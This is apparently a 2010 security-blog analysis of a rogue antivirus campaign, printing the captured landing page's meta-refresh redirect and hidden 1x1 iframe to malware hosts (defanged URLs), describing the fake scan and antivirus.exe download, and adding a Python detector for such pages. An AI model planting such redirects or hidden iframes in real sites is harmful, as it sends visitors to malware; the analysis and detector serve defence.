Analysis of rogue anti virus software
August 20, 2010 2 Comments
MX Lab reported earlier on the circulation of a malware campaign that leads to rogue anti virus software and to further infections of your computer, in the following blog articles:
Resume emails with attached file Resume.html leads to rogue AV software
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe
We have now managed to get a real sample of the malware and a working web site that hosts the malicious scripts and the fake anti virus screens. In a comment on one of our blog posts, a reader provided us with the following URL: hxxp://kidstylesource.com/x.html.
When we opened this URL we got the iframe script that is used in this campaign:
PLEASE WAITING 4 SECOND...
<meta http-equiv="refresh" content="4; url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>
<iframe src="hxxp://protectionreader.in/media/index.php?xml=back&rnd=img&nid=151&hash=ecard&c=4" style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>
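The landing page combines a meta refresh redirect with a hidden 1x1 iframe. The following scanner, an added example that is not part of the original MX Lab post, flags both patterns in a page so that such landing pages can be spotted in captured HTML; the sample page below is constructed from the snippet above with the URLs kept defanged (hxxp).

```python
import re
from html.parser import HTMLParser

# Constructed sample, modelled on the captured landing page (URLs defanged with hxxp).
SAMPLE_PAGE = """PLEASE WAITING 4 SECOND...
<meta http-equiv="refresh" content="4; url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>
<iframe src="hxxp://protectionreader.in/media/index.php?xml=back&rnd=img&nid=151&hash=ecard&c=4"
        style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>"""


class RedirectIframeScanner(HTMLParser):
    """Collects meta-refresh redirect targets and hidden or 1x1 iframe sources."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, url) tuples, in document order

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values may be None
        a = {name: (value or "") for name, value in attrs}
        if tag == "meta" and a.get("http-equiv", "").strip().lower() == "refresh":
            # content looks like "4; url=<target>"; pull out the target URL
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = "visibility:hidden" in style or "display:none" in style
            tiny = a.get("height", "").strip() in ("0", "1") and a.get("width", "").strip() in ("0", "1")
            if hidden or tiny:
                self.findings.append(("hidden-iframe", a.get("src", "")))


def scan_page(markup):
    """Return the suspicious redirect/iframe findings for one HTML document."""
    scanner = RedirectIframeScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, url in scan_page(SAMPLE_PAGE):
        print(f"{kind}: {url}")
```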
We soon got the following screen in our browser and a pop up window with the message that our system is infected. Oh, yes, we continue now to see what happens. Do not try this at home!

After clicking on OK we got a screen that starts scanning the computer system. The progress bar advances far too fast for a real anti virus scanner, and the first alleged infections are reported on your system.

A new popup with a Windows Security Alert appears when the scan is finished. When we clicked on the button Remove all we were offered the download of a 164 kB file, antivirus.exe.
When we submitted this file to VirusTotal, 19 of the 42 AV engines detected the trojan, with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).
VirusTotal permalink and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.

Hello
Just wanted to say that I used SUPERAntiSpyware free version to get it off my computer and it works very well.
Roffe